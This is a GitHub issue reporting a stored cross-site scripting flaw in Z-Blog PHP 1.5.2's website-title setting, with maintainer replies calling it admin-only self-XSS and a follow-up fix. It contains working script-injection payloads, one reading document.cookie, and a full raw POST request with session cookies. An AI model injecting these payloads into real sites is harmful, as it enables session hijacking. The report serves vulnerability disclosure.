Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Z-Blog php has a stored Cross Site Scripting Vulnerability #185

Closed
Oran9e opened this issue May 2, 2018 · 2 comments
Closed

Z-Blog php has a stored Cross Site Scripting Vulnerability #185

Oran9e opened this issue May 2, 2018 · 2 comments

Comments

@Oran9e
Copy link

Oran9e commented May 2, 2018

Z-Blog php has a stored Cross Site Scripting Vulnerability
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php
Web site settings --> Basic setting --> Website title
payload:"/><script>confirm(1234)</script>
save it.

exp
POST /test/zblogphp-master/zb_system/cmd.php?act=SettingSav&csrfToken=30440aaabfe797968365be7946a0fc8a HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php?act=SettingMng
Content-Type: application/x-www-form-urlencoded
Content-Length: 1019
Cookie: timezone=8; username=admin; token=67afc0921f3adc02c6b8a8c32fa68c53ebac56e9a16a92342924e9d05609f78f1525347253; addinfotestzblogphp-master=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; PHPSESSID=sv1dq8htd2l5heme25b1b2vvb1; artshu=1; xiaoxi=%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_yi_jian_jian_yi_2821%2F+target%3D_blank%3E%E6%84%8F%E8%A7%81%E5%BB%BA%E8%AE%AEBUG%E5%8F%8D%E9%A6%88%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20171101+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.6%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20170804+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.5%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_mo_ban_xia_zai_3611%2F+target%3D_blank%3E20170804+axublog%E6%A8%A1%E6%9D%BF%E4%B8%8B%E8%BD%BD%EF%BC%9Auedc%E3%80%90%E9%80%82%E5%90%881.0.5%E7%89%88%E6%9C%AC%E3%80%91%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_0038%2F+target%3D_blank%3E20170619+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.2%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_221437%2F+target%3D_blank%3E20170616+axublog1.0.1%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Fben_zhan_xian_zai_yong_de_hei_bai_190507%2F+target%3D_blank%3E20170614+%E9%BB%91%E7%99%BD%E8%93%9D%E4%B8%BB%E9%A2%98%E4%B8%8B%E8%BD%BD%3C%2Fa%3E+%3C%2Fp%3E+%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog100_jie_shao_he_181144%2F+target%3D_blank%3E20170610+axublog1.0.0%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A
Connection: keep-alive
Upgrade-Insecure-Requests: 1

ZC_BLOG_HOST=http%3A%2F%2F127.0.0.1%2Ftest%2Fzblogphp-master%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=zblog"/><script>confirm(1234)</script>&ZC_BLOG_SUBNAME=Good+Luck+To+You%21&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba%7Casa&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_ADDITIONAL_SECURITY=1&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
1
2
3

payload:"/><script>confirm(document.cookie)</script>

Affected Version:
1.5.2

@zsxsoft
Copy link
Contributor

zsxsoft commented May 2, 2018

If you get the admin privilege, we have so many self-xss ways. This's just a functional bug which can break the management page.
By the way, we will fix this bug, thank you.

@zsxsoft zsxsoft added the BUG label May 2, 2018
@zsxsoft
Copy link
Contributor

zsxsoft commented May 2, 2018

P.S. To save our time, please don't submit useless "XSS", and even some of which are features. For example, injecting "<script>" into article title or content..

rainbowsoft added a commit that referenced this issue May 3, 2018
同时修复了一个后台信息的问题;
@zsxsoft zsxsoft closed this as completed May 4, 2018
zsxsoft pushed a commit that referenced this issue Jul 4, 2018
同时修复了一个后台信息的问题;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants